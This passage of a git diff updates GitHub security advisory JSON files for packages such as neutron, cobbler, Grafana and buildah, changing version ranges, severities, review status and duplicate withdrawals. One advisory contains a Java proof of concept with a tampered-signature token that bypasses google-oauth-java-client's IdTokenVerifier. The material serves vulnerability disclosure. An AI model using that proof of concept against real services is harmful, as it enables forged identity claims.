"GHSA-x634-34m9-96mp", - "modified": "2022-05-13T01:07:33Z", + "modified": "2024-04-08T18:53:05Z", "published": "2022-05-13T01:07:33Z", "aliases": [ "CVE-2018-14635" ], + "summary": "OpensStack Neutron Denial of Service Vulnerability", "details": "When using the Linux bridge ml2 driver, non-privileged tenants are able to create and attach ports without specifying an IP address, bypassing IP address validation. A potential denial of service could occur if an IP address, conflicting with existing guests or routers, is then assigned from outside of the allowed allocation pool. Versions of openstack-neutron before 13.0.0.0b2, 12.0.3 and 11.0.5 are vulnerable.", "severity": [ { @@ -14,13 +15,76 @@ } ], "affected": [ - + { + "package": { + "ecosystem": "PyPI", + "name": "neutron" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "13.0.0.0b1" + }, + { + "fixed": "13.0.0.0b2" + } + ] + } + ], + "versions": [ + "13.0.0.0b1" + ] + }, + { + "package": { + "ecosystem": "PyPI", + "name": "neutron" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "12.0.0" + }, + { + "fixed": "12.0.3" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "PyPI", + "name": "neutron" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "11.0.0" + }, + { + "fixed": "11.0.5" + } + ] + } + ] + } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-14635" }, + { + "type": "WEB", + "url": "https://github.com/openstack/neutron/commit/54aa6e81cb17b33ce4d5d469cc11dec2869c762d" + }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:2710" @@ -48,6 +112,10 @@ { "type": "WEB", "url": "https://git.openstack.org/cgit/openstack/neutron/commit/?id=54aa6e81cb17b33ce4d5d469cc11dec2869c762d" + }, + { + "type": "PACKAGE", + "url": "https://github.com/openstack/neutron" } ], "database_specific": { @@ -55,8 +123,8 @@ "CWE-20" ], "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, + "github_reviewed": true, + "github_reviewed_at": "2024-04-08T18:53:04Z", "nvd_published_at": "2018-09-10T19:29:00Z" } } \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-xc7w-jvhx-p6q9/GHSA-xc7w-jvhx-p6q9.json b/advisories/github-reviewed/2022/05/GHSA-xc7w-jvhx-p6q9/GHSA-xc7w-jvhx-p6q9.json similarity index 56% rename from advisories/unreviewed/2022/05/GHSA-xc7w-jvhx-p6q9/GHSA-xc7w-jvhx-p6q9.json rename to advisories/github-reviewed/2022/05/GHSA-xc7w-jvhx-p6q9/GHSA-xc7w-jvhx-p6q9.json index 40a2857e634..6d6b7cf21ac 100644 --- a/advisories/unreviewed/2022/05/GHSA-xc7w-jvhx-p6q9/GHSA-xc7w-jvhx-p6q9.json +++ b/advisories/github-reviewed/2022/05/GHSA-xc7w-jvhx-p6q9/GHSA-xc7w-jvhx-p6q9.json @@ -1,17 +1,55 @@ { "schema_version": "1.4.0", "id": "GHSA-xc7w-jvhx-p6q9", - "modified": "2022-05-14T02:52:42Z", + "modified": "2024-04-08T18:58:55Z", "published": "2022-05-14T02:52:42Z", "aliases": [ "CVE-2014-3225" ], + "summary": "Cobbler Path Traversal vulnerability", "details": "Absolute path traversal vulnerability in the web interface in Cobbler 2.4.x through 2.6.x allows remote authenticated users to read arbitrary files via the Kickstart field in a profile.", "severity": [ ], "affected": [ - + { + "package": { + "ecosystem": "PyPI", + "name": "cobbler" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.6.0" + }, + { + "fixed": "2.6.4" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "PyPI", + "name": "cobbler" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.4.0" + }, + { + "fixed": "2.4.7" + } + ] + } + ] + } ], "references": [ { @@ -22,6 +60,18 @@ "type": "WEB", "url": "https://github.com/cobbler/cobbler/issues/939" }, + { + "type": "WEB", + "url": "https://github.com/cobbler/cobbler/commit/8232c0e88ec7382d3f8d3bf48c81a4a91ac4325d" + }, + { + "type": "WEB", + "url": "https://github.com/cobbler/cobbler/commit/f757e3096fcd32397609ca38efb01f19d16dd634" + }, + { + "type": "PACKAGE", + "url": "https://github.com/cobbler/cobbler" + }, { "type": "WEB", "url": "https://www.youtube.com/watch?v=vuBaoQUFEYQ&feature=youtu.be" @@ -60,8 +110,8 @@ "CWE-22" ], "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, + "github_reviewed": true, + "github_reviewed_at": "2024-04-08T18:58:54Z", "nvd_published_at": "2014-05-14T00:55:00Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-xh97-72ww-2w58/GHSA-xh97-72ww-2w58.json b/advisories/github-reviewed/2022/05/GHSA-xh97-72ww-2w58/GHSA-xh97-72ww-2w58.json index b33d4628570..d1b919e9fb8 100644 --- a/advisories/github-reviewed/2022/05/GHSA-xh97-72ww-2w58/GHSA-xh97-72ww-2w58.json +++ b/advisories/github-reviewed/2022/05/GHSA-xh97-72ww-2w58/GHSA-xh97-72ww-2w58.json @@ -1,13 +1,14 @@ { "schema_version": "1.4.0", "id": "GHSA-xh97-72ww-2w58", - "modified": "2022-06-09T23:51:47Z", + "modified": "2024-04-09T15:11:14Z", "published": "2022-05-04T00:00:22Z", + "withdrawn": "2024-04-09T15:11:14Z", "aliases": [ - "CVE-2021-22573" + ], - "summary": "Improper Verification of Cryptographic Signature in google-oauth-java-client", - "details": "### Summary\nThe vulnerability impacts only users of the IdTokenVerifier class. The verify method in IdTokenVerifier does not validate the signature before verifying the claims (e.g., iss, aud, etc.). Signature verification makes sure that the token's payload comes from valid provider, not from someone else.\n\nAn attacker can provide a compromised token with modified payload like email or phone number. The token will pass the validation by the library. Once verified, modified payload can be used by the application. \n\nIf the application sends verified IdToken to other service as is like for auth - the risk is low, because the backend of the service is expected to check the signature and fail the request. \n\nReporter: [Tamjid al Rahat](https://github.com/tamjidrahat), contributor\n\n### Patches\nThe issue was fixed in the 1.33.3 version of the library\n\n### Proof of Concept\nTo reproduce, one needs to call the verify function with an IdToken instance that contains a malformed signature to successfully bypass the checks inside the verify function.\n\n```\n /** A default http transport factory for testing */\n static class DefaultHttpTransportFactory implements HttpTransportFactory {\n public HttpTransport create() {\n return new NetHttpTransport();\n }\n }\n\n// The below token has some modified bits in the signature\n private static final String SERVICE_ACCOUNT_RS256_TOKEN_BAD_SIGNATURE = \n\"eyJhbGciOiJSUzI1NiIsImtpZCI6IjJlZjc3YjM4YTFiMDM3MDQ4NzA0MzkxNmFjYmYyN2Q3NG\" +\n\"VkZDA4YjEiLCJ0eXAiOiJKV1QifQ.eyJhdWQiOiJodHRwczovL2V4YW1wbGUuY29tL2F1ZGllbm\" +\n\"NlIiwiZXhwIjoxNTg3NjMwNTQzLCJpYXQiOjE1ODc2MjY5NDMsImlzcyI6InNvbWUgaXNzdWVy\" +\n\"Iiwic3ViIjoic29tZSBzdWJqZWN0In0.gGOQW0qQgs4jGUmCsgRV83RqsJLaEy89-ZOG6p1u0Y26\" +\n\"FyY06b6Odgd7xXLsSTiiSnch62dl0Lfi9D0x2ByxvsGOCbovmBl2ZZ0zHr1wpc4N0XS9lMUq5RJ\" + \n\"QbonDibxXG4nC2zroDfvD0h7i-L8KMXeJb9pYwW7LkmrM_YwYfJnWnZ4bpcsDjojmPeUBlACg7tjjOgBFby\" +\n\"QZvUtaERJwSRlaWibvNjof7eCVfZChE0PwBpZc_cGqSqKXv544L4ttqdCnm0NjqrTATXwC4gYx\" + \n\"ruevkjHfYI5ojcQmXoWDJJ0-_jzfyPE4MFFdCFgzLgnfIOwe5ve0MtquKuv2O0pgvg\";\n\nIdTokenVerifier tokenVerifier =\n new IdTokenVerifier.Builder()\n .setClock(clock)\n .setCertificatesLocation(\"https://www.googleapis.com/robot/v1/metadata/x509/integration-tests%40chingor-test.iam.gserviceaccount.com\")\n .setHttpTransportFactory(new DefaultHttpTransportFactory())\n .build();\n\n// verification will return true despite modified signature for versions <1.33.3\ntokenVerifier.verify(IdToken.parse(GsonFactory.getDefaultInstance(), SERVICE_ACCOUNT_RS256_TOKEN_BAD_SIGNATURE));\n\n```\n\n### Remediation and Mitigation\nUpdate to the version 1.33.3 or higher \n\nIf the library used indirectly or cannot be updated for any reason you can use similar IdToken verifiers provided by Google that already has signature verification. For example: \n[google-auth-library-java](https://github.com/googleapis/google-auth-library-java/blob/main/oauth2_http/java/com/google/auth/oauth2/TokenVerifier.java)\n[google-api-java-client](https://github.com/googleapis/google-api-java-client/blob/main/google-api-client/src/main/java/com/google/api/client/googleapis/auth/oauth2/GoogleIdTokenVerifier.java)\n\n###Timeline\nDate reported: 12 Dec 2021\nDate fixed: 13 Apr 2022\nDate disclosed: 2 May 2022\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Open an issue in the [google-oauth-java-client](https://github.com/googleapis/google-oauth-java-client) repo", + "summary": "Duplicate Advisory: Improper Verification of Cryptographic Signature in google-oauth-java-client", + "details": "### Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-hw42-3568-wj87. This link is maintained to preserve external references.\n\n### Summary\nThe vulnerability impacts only users of the IdTokenVerifier class. The verify method in IdTokenVerifier does not validate the signature before verifying the claims (e.g., iss, aud, etc.). Signature verification makes sure that the token's payload comes from valid provider, not from someone else.\n\nAn attacker can provide a compromised token with modified payload like email or phone number. The token will pass the validation by the library. Once verified, modified payload can be used by the application. \n\nIf the application sends verified IdToken to other service as is like for auth - the risk is low, because the backend of the service is expected to check the signature and fail the request. \n\nReporter: [Tamjid al Rahat](https://github.com/tamjidrahat), contributor\n\n### Patches\nThe issue was fixed in the 1.33.3 version of the library\n\n### Proof of Concept\nTo reproduce, one needs to call the verify function with an IdToken instance that contains a malformed signature to successfully bypass the checks inside the verify function.\n\n```\n /** A default http transport factory for testing */\n static class DefaultHttpTransportFactory implements HttpTransportFactory {\n public HttpTransport create() {\n return new NetHttpTransport();\n }\n }\n\n// The below token has some modified bits in the signature\n private static final String SERVICE_ACCOUNT_RS256_TOKEN_BAD_SIGNATURE = \n\"eyJhbGciOiJSUzI1NiIsImtpZCI6IjJlZjc3YjM4YTFiMDM3MDQ4NzA0MzkxNmFjYmYyN2Q3NG\" +\n\"VkZDA4YjEiLCJ0eXAiOiJKV1QifQ.eyJhdWQiOiJodHRwczovL2V4YW1wbGUuY29tL2F1ZGllbm\" +\n\"NlIiwiZXhwIjoxNTg3NjMwNTQzLCJpYXQiOjE1ODc2MjY5NDMsImlzcyI6InNvbWUgaXNzdWVy\" +\n\"Iiwic3ViIjoic29tZSBzdWJqZWN0In0.gGOQW0qQgs4jGUmCsgRV83RqsJLaEy89-ZOG6p1u0Y26\" +\n\"FyY06b6Odgd7xXLsSTiiSnch62dl0Lfi9D0x2ByxvsGOCbovmBl2ZZ0zHr1wpc4N0XS9lMUq5RJ\" + \n\"QbonDibxXG4nC2zroDfvD0h7i-L8KMXeJb9pYwW7LkmrM_YwYfJnWnZ4bpcsDjojmPeUBlACg7tjjOgBFby\" +\n\"QZvUtaERJwSRlaWibvNjof7eCVfZChE0PwBpZc_cGqSqKXv544L4ttqdCnm0NjqrTATXwC4gYx\" + \n\"ruevkjHfYI5ojcQmXoWDJJ0-_jzfyPE4MFFdCFgzLgnfIOwe5ve0MtquKuv2O0pgvg\";\n\nIdTokenVerifier tokenVerifier =\n new IdTokenVerifier.Builder()\n .setClock(clock)\n .setCertificatesLocation(\"https://www.googleapis.com/robot/v1/metadata/x509/integration-tests%40chingor-test.iam.gserviceaccount.com\")\n .setHttpTransportFactory(new DefaultHttpTransportFactory())\n .build();\n\n// verification will return true despite modified signature for versions <1.33.3\ntokenVerifier.verify(IdToken.parse(GsonFactory.getDefaultInstance(), SERVICE_ACCOUNT_RS256_TOKEN_BAD_SIGNATURE));\n\n```\n\n### Remediation and Mitigation\nUpdate to the version 1.33.3 or higher \n\nIf the library used indirectly or cannot be updated for any reason you can use similar IdToken verifiers provided by Google that already has signature verification. For example: \n[google-auth-library-java](https://github.com/googleapis/google-auth-library-java/blob/main/oauth2_http/java/com/google/auth/oauth2/TokenVerifier.java)\n[google-api-java-client](https://github.com/googleapis/google-api-java-client/blob/main/google-api-client/src/main/java/com/google/api/client/googleapis/auth/oauth2/GoogleIdTokenVerifier.java)\n\n###Timeline\nDate reported: 12 Dec 2021\nDate fixed: 13 Apr 2022\nDate disclosed: 2 May 2022\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Open an issue in the [google-oauth-java-client](https://github.com/googleapis/google-oauth-java-client) repo", "severity": [ { "type": "CVSS_V3", diff --git a/advisories/unreviewed/2022/09/GHSA-7pf9-7cff-f854/GHSA-7pf9-7cff-f854.json b/advisories/github-reviewed/2022/09/GHSA-7pf9-7cff-f854/GHSA-7pf9-7cff-f854.json similarity index 51% rename from advisories/unreviewed/2022/09/GHSA-7pf9-7cff-f854/GHSA-7pf9-7cff-f854.json rename to advisories/github-reviewed/2022/09/GHSA-7pf9-7cff-f854/GHSA-7pf9-7cff-f854.json index 35d3af241b3..974c0061ce2 100644 --- a/advisories/unreviewed/2022/09/GHSA-7pf9-7cff-f854/GHSA-7pf9-7cff-f854.json +++ b/advisories/github-reviewed/2022/09/GHSA-7pf9-7cff-f854/GHSA-7pf9-7cff-f854.json @@ -1,11 +1,12 @@ { "schema_version": "1.4.0", "id": "GHSA-7pf9-7cff-f854", - "modified": "2022-09-08T00:00:30Z", + "modified": "2024-04-08T19:03:02Z", "published": "2022-09-02T00:01:01Z", "aliases": [ "CVE-2022-2806" ], + "summary": "sosreport Exposure of Sensitive Information vulnerability", "details": "It was found that the ovirt-log-collector/sosreport collects the RHV admin password unfiltered. Fixed in: sos-4.2-20.el8_6, ovirt-log-collector-4.4.7-2.el8ev", "severity": [ { @@ -14,7 +15,25 @@ } ], "affected": [ - + { + "package": { + "ecosystem": "PyPI", + "name": "sosreport" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "4.4" + } + ] + } + ] + } ], "references": [ { @@ -24,15 +43,23 @@ { "type": "WEB", "url": "https://github.com/sosreport/sos/pull/2947" + }, + { + "type": "WEB", + "url": "https://github.com/sosreport/sos/commit/5fd872c64c53af37015f366295e0c2418c969757" + }, + { + "type": "PACKAGE", + "url": "https://github.com/sosreport/sos" } ], "database_specific": { "cwe_ids": [ - + "CWE-200" ], "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, + "github_reviewed": true, + "github_reviewed_at": "2024-04-08T19:03:02Z", "nvd_published_at": "2022-09-01T21:15:00Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2022/10/GHSA-9jjw-hf72-3mxw/GHSA-9jjw-hf72-3mxw.json b/advisories/github-reviewed/2022/10/GHSA-9jjw-hf72-3mxw/GHSA-9jjw-hf72-3mxw.json index 2e25275f12a..1b44a98eb9e 100644 --- a/advisories/github-reviewed/2022/10/GHSA-9jjw-hf72-3mxw/GHSA-9jjw-hf72-3mxw.json +++ b/advisories/github-reviewed/2022/10/GHSA-9jjw-hf72-3mxw/GHSA-9jjw-hf72-3mxw.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-9jjw-hf72-3mxw", - "modified": "2022-10-07T07:22:33Z", + "modified": "2024-04-09T14:24:23Z", "published": "2022-10-07T07:22:33Z", "aliases": [ "CVE-2020-26269" @@ -11,7 +11,7 @@ "severity": [ { "type": "CVSS_V3", - "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H" } ], "affected": [ @@ -111,7 +111,7 @@ "cwe_ids": [ "CWE-125" ], - "severity": "HIGH", + "severity": "CRITICAL", "github_reviewed": true, "github_reviewed_at": "2022-10-07T07:22:33Z", "nvd_published_at": "2020-12-10T23:15:00Z" diff --git a/advisories/github-reviewed/2022/12/GHSA-894q-wpg5-mf2h/GHSA-894q-wpg5-mf2h.json b/advisories/github-reviewed/2022/12/GHSA-894q-wpg5-mf2h/GHSA-894q-wpg5-mf2h.json index 0befbcfe4aa..1307131c864 100644 --- a/advisories/github-reviewed/2022/12/GHSA-894q-wpg5-mf2h/GHSA-894q-wpg5-mf2h.json +++ b/advisories/github-reviewed/2022/12/GHSA-894q-wpg5-mf2h/GHSA-894q-wpg5-mf2h.json @@ -1,13 +1,13 @@ { "schema_version": "1.4.0", "id": "GHSA-894q-wpg5-mf2h", - "modified": "2022-12-13T19:32:22Z", + "modified": "2024-04-08T17:20:47Z", "published": "2022-12-10T12:30:18Z", "aliases": [ "CVE-2022-4396" ], "summary": "pyRdfa3 Cross-site Scripting vulnerability", - "details": "A vulnerability was found in RDFlib pyrdfa3 and classified as problematic. This issue affects the function _get_option of the file pyRdfa/__init__.py. The manipulation leads to cross site scripting. The attack may be initiated remotely. The name of the patch is ffd1d62dd50d5f4190013b39cedcdfbd81f3ce3e. It is recommended to apply a patch to fix this issue. The identifier VDB-215249 was assigned to this vulnerability. \n\nNOTE: RDFlib is no longer being developed and is looking for a new maintainer \nhttps://github.com/RDFLib/pyrdfa3/issues/38", + "details": "A vulnerability was found in RDFlib pyrdfa3 and classified as problematic. This issue affects the function `_get_option` of the file `pyRdfa/__init__.py`. The manipulation leads to cross site scripting. The attack may be initiated remotely. The name of the patch is ffd1d62dd50d5f4190013b39cedcdfbd81f3ce3e. It is recommended to apply a patch to fix this issue. The identifier VDB-215249 was assigned to this vulnerability.", "severity": [ { "type": "CVSS_V3", @@ -28,11 +28,14 @@ "introduced": "0" }, { - "last_affected": "3.5.3" + "fixed": "3.6.2" } ] } - ] + ], + "database_specific": { + "last_known_affected_version_range": "<= 3.5.3" + } } ], "references": [ @@ -63,6 +66,7 @@ ], "database_specific": { "cwe_ids": [ + "CWE-707", "CWE-79" ], "severity": "MODERATE", diff --git a/advisories/github-reviewed/2023/04/GHSA-5cx2-vq3h-x52c/GHSA-5cx2-vq3h-x52c.json b/advisories/github-reviewed/2023/04/GHSA-5cx2-vq3h-x52c/GHSA-5cx2-vq3h-x52c.json index bcf0bc5774a..ff2a4da1745 100644 --- a/advisories/github-reviewed/2023/04/GHSA-5cx2-vq3h-x52c/GHSA-5cx2-vq3h-x52c.json +++ b/advisories/github-reviewed/2023/04/GHSA-5cx2-vq3h-x52c/GHSA-5cx2-vq3h-x52c.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-5cx2-vq3h-x52c", - "modified": "2023-05-24T18:34:30Z", + "modified": "2024-04-08T15:35:54Z", "published": "2023-04-24T18:30:30Z", "aliases": [ "CVE-2023-27524" @@ -54,11 +54,11 @@ }, { "type": "WEB", - "url": "http://packetstormsecurity.com/files/172522/Apache-Superset-2.0.0-Authentication-Bypass.html" + "url": "https://packetstormsecurity.com/files/172522/Apache-Superset-2.0.0-Authentication-Bypass.html" }, { "type": "WEB", - "url": "http://packetstormsecurity.com/files/175094/Apache-Superset-2.0.0-Remote-Code-Execution.html" + "url": "https://packetstormsecurity.com/files/175094/Apache-Superset-2.0.0-Remote-Code-Execution.html" }, { "type": "WEB", diff --git a/advisories/github-reviewed/2024/02/GHSA-rggv-cv7r-mw98/GHSA-rggv-cv7r-mw98.json b/advisories/github-reviewed/2024/02/GHSA-rggv-cv7r-mw98/GHSA-rggv-cv7r-mw98.json index 936459b5c04..b1757da7526 100644 --- a/advisories/github-reviewed/2024/02/GHSA-rggv-cv7r-mw98/GHSA-rggv-cv7r-mw98.json +++ b/advisories/github-reviewed/2024/02/GHSA-rggv-cv7r-mw98/GHSA-rggv-cv7r-mw98.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-rggv-cv7r-mw98", - "modified": "2024-03-29T15:30:27Z", + "modified": "2024-04-07T00:30:32Z", "published": "2024-02-26T20:13:46Z", "aliases": [ "CVE-2024-22201" @@ -199,6 +199,10 @@ "type": "PACKAGE", "url": "https://github.com/jetty/jetty.project" }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2024/04/msg00002.html" + }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20240329-0001" diff --git a/advisories/github-reviewed/2024/03/GHSA-7w75-32cg-r6g2/GHSA-7w75-32cg-r6g2.json b/advisories/github-reviewed/2024/03/GHSA-7w75-32cg-r6g2/GHSA-7w75-32cg-r6g2.json index 6fc0b99d8ae..48aadb8941f 100644 --- a/advisories/github-reviewed/2024/03/GHSA-7w75-32cg-r6g2/GHSA-7w75-32cg-r6g2.json +++ b/advisories/github-reviewed/2024/03/GHSA-7w75-32cg-r6g2/GHSA-7w75-32cg-r6g2.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-7w75-32cg-r6g2", - "modified": "2024-04-03T00:30:55Z", + "modified": "2024-04-06T06:31:08Z", "published": "2024-03-13T18:31:34Z", "aliases": [ "CVE-2024-24549" @@ -218,6 +218,10 @@ "type": "WEB", "url": "https://lists.apache.org/thread/4c50rmomhbbsdgfjsgwlb51xdwfjdcvg" }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2024/04/msg00001.html" + }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20240402-0002" diff --git a/advisories/unreviewed/2024/03/GHSA-9mg4-v392-8j68/GHSA-9mg4-v392-8j68.json b/advisories/github-reviewed/2024/03/GHSA-9mg4-v392-8j68/GHSA-9mg4-v392-8j68.json similarity index 52% rename from advisories/unreviewed/2024/03/GHSA-9mg4-v392-8j68/GHSA-9mg4-v392-8j68.json rename to advisories/github-reviewed/2024/03/GHSA-9mg4-v392-8j68/GHSA-9mg4-v392-8j68.json index e3e3405d464..e89a53566cb 100644 --- a/advisories/unreviewed/2024/03/GHSA-9mg4-v392-8j68/GHSA-9mg4-v392-8j68.json +++ b/advisories/github-reviewed/2024/03/GHSA-9mg4-v392-8j68/GHSA-9mg4-v392-8j68.json @@ -1,17 +1,39 @@ { "schema_version": "1.4.0", "id": "GHSA-9mg4-v392-8j68", - "modified": "2024-03-19T15:30:34Z", + "modified": "2024-04-08T16:46:04Z", "published": "2024-03-19T15:30:34Z", "aliases": [ "CVE-2023-50966" ], + "summary": "erlang-jose vulnerable to denial of service via large p2c value", "details": "erlang-jose (aka JOSE for Erlang and Elixir) through 1.11.6 allow attackers to cause a denial of service (CPU consumption) via a large p2c (aka PBES2 Count) value in a JOSE header.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" + } ], "affected": [ - + { + "package": { + "ecosystem": "Hex", + "name": "erlang-jose" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "1.11.7" + } + ] + } + ] + } ], "references": [ { @@ -20,10 +42,14 @@ }, { "type": "WEB", - "url": "https://github.com/P3ngu1nW/CVE_Request/blob/main/erlang-jose.md" + "url": "https://github.com/potatosalad/erlang-jose/commit/718d213f07b08056737923f8063d5df56dcb66ae" }, { "type": "WEB", + "url": "https://github.com/P3ngu1nW/CVE_Request/blob/main/erlang-jose.md" + }, + { + "type": "PACKAGE", "url": "https://github.com/potatosalad/erlang-jose" }, { @@ -33,11 +59,11 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-400" ], - "severity": null, - "github_reviewed": false, - "github_reviewed_at": null, + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-04-08T16:46:03Z", "nvd_published_at": "2024-03-19T15:15:07Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2024/03/GHSA-f5x3-32g6-xq36/GHSA-f5x3-32g6-xq36.json b/advisories/github-reviewed/2024/03/GHSA-f5x3-32g6-xq36/GHSA-f5x3-32g6-xq36.json index 7eeafff8102..d381206db01 100644 --- a/advisories/github-reviewed/2024/03/GHSA-f5x3-32g6-xq36/GHSA-f5x3-32g6-xq36.json +++ b/advisories/github-reviewed/2024/03/GHSA-f5x3-32g6-xq36/GHSA-f5x3-32g6-xq36.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-f5x3-32g6-xq36", - "modified": "2024-03-22T16:57:05Z", + "modified": "2024-04-09T19:02:31Z", "published": "2024-03-22T16:57:05Z", "aliases": [ "CVE-2024-28863" @@ -33,6 +33,25 @@ ] } ] + }, + { + "package": { + "ecosystem": "npm", + "name": "tar" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "6.2.1" + } + ] + } + ] } ], "references": [ diff --git a/advisories/github-reviewed/2024/03/GHSA-mh7p-8m2f-qrm6/GHSA-mh7p-8m2f-qrm6.json b/advisories/github-reviewed/2024/03/GHSA-mh7p-8m2f-qrm6/GHSA-mh7p-8m2f-qrm6.json index 3579c3da02f..3a081395d41 100644 --- a/advisories/github-reviewed/2024/03/GHSA-mh7p-8m2f-qrm6/GHSA-mh7p-8m2f-qrm6.json +++ b/advisories/github-reviewed/2024/03/GHSA-mh7p-8m2f-qrm6/GHSA-mh7p-8m2f-qrm6.json @@ -1,13 +1,14 @@ { "schema_version": "1.4.0", "id": "GHSA-mh7p-8m2f-qrm6", - "modified": "2024-03-27T02:01:45Z", + "modified": "2024-04-05T19:30:35Z", "published": "2024-03-26T18:32:07Z", + "withdrawn": "2024-04-05T19:30:35Z", "aliases": [ - "CVE-2024-1313" + ], - "summary": "Grafana vulnerable to authorization bypass", - "details": "It is possible for a user in a different organization from the owner of a snapshot to bypass authorization and delete a snapshot by issuing a `DELETE` request to `/api/snapshots/` using its view key. This functionality is intended to only be available to individuals with the permission to write/edit to the snapshot in question, but due to a bug in the authorization logic, deletion requests issued by an unprivileged user in a different organization than the snapshot owner are treated as authorized.\n\nGrafana Labs would like to thank Ravid Mazon and Jay Chen of Palo Alto Research for discovering and disclosing this vulnerability.\n\nThis issue affects Grafana: from 9.5.0 before 9.5.18, from 10.0.0 before 10.0.13, from 10.1.0 before 10.1.9, from 10.2.0 before 10.2.6, from 10.3.0 before 10.3.5.\n\n", + "summary": "Duplicate Advisory: Grafana vulnerable to authorization bypass", + "details": "## Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-67rv-qpw2-6qrr. This link is maintained to preserve external references.\n\n## Original Description\nIt is possible for a user in a different organization from the owner of a snapshot to bypass authorization and delete a snapshot by issuing a `DELETE` request to `/api/snapshots/` using its view key. This functionality is intended to only be available to individuals with the permission to write/edit to the snapshot in question, but due to a bug in the authorization logic, deletion requests issued by an unprivileged user in a different organization than the snapshot owner are treated as authorized.\n\nGrafana Labs would like to thank Ravid Mazon and Jay Chen of Palo Alto Research for discovering and disclosing this vulnerability.\n\nThis issue affects Grafana: from 9.5.0 before 9.5.18, from 10.0.0 before 10.0.13, from 10.1.0 before 10.1.9, from 10.2.0 before 10.2.6, from 10.3.0 before 10.3.5.\n\n", "severity": [ { "type": "CVSS_V3", diff --git a/advisories/github-reviewed/2024/03/GHSA-pmf3-c36m-g5cf/GHSA-pmf3-c36m-g5cf.json b/advisories/github-reviewed/2024/03/GHSA-pmf3-c36m-g5cf/GHSA-pmf3-c36m-g5cf.json index 20c22cad492..3210aabf75c 100644 --- a/advisories/github-reviewed/2024/03/GHSA-pmf3-c36m-g5cf/GHSA-pmf3-c36m-g5cf.json +++ b/advisories/github-reviewed/2024/03/GHSA-pmf3-c36m-g5cf/GHSA-pmf3-c36m-g5cf.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-pmf3-c36m-g5cf", - "modified": "2024-03-27T17:28:27Z", + "modified": "2024-04-05T18:36:17Z", "published": "2024-03-19T20:06:52Z", "aliases": [ @@ -60,7 +60,7 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "1.24.0" + "introduced": "1.33.0" }, { "fixed": "1.33.7" @@ -68,6 +68,101 @@ ] } ] + }, + { + "package": { + "ecosystem": "Go", + "name": "github.com/containers/buildah" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "1.25.0" + }, + { + "fixed": "1.27.4" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Go", + "name": "github.com/containers/buildah" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "1.24.0" + }, + { + "fixed": "1.24.7" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Go", + "name": "github.com/containers/buildah" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "1.28.0" + }, + { + "fixed": "1.29.3" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Go", + "name": "github.com/containers/buildah" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "1.30.0" + }, + { + "fixed": "1.31.5" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Go", + "name": "github.com/containers/buildah" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "1.32.0" + }, + { + "fixed": "1.32.3" + } + ] + } + ] } ], "references": [ @@ -75,6 +170,10 @@ "type": "WEB", "url": "https://github.com/containers/buildah/security/advisories/GHSA-pmf3-c36m-g5cf" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1753" + }, { "type": "WEB", "url": "https://github.com/containers/buildah/commit/3deda19137f5dec0285bbb832bd93c22d860b087" diff --git a/advisories/github-reviewed/2024/03/GHSA-v682-8vv8-vpwr/GHSA-v682-8vv8-vpwr.json 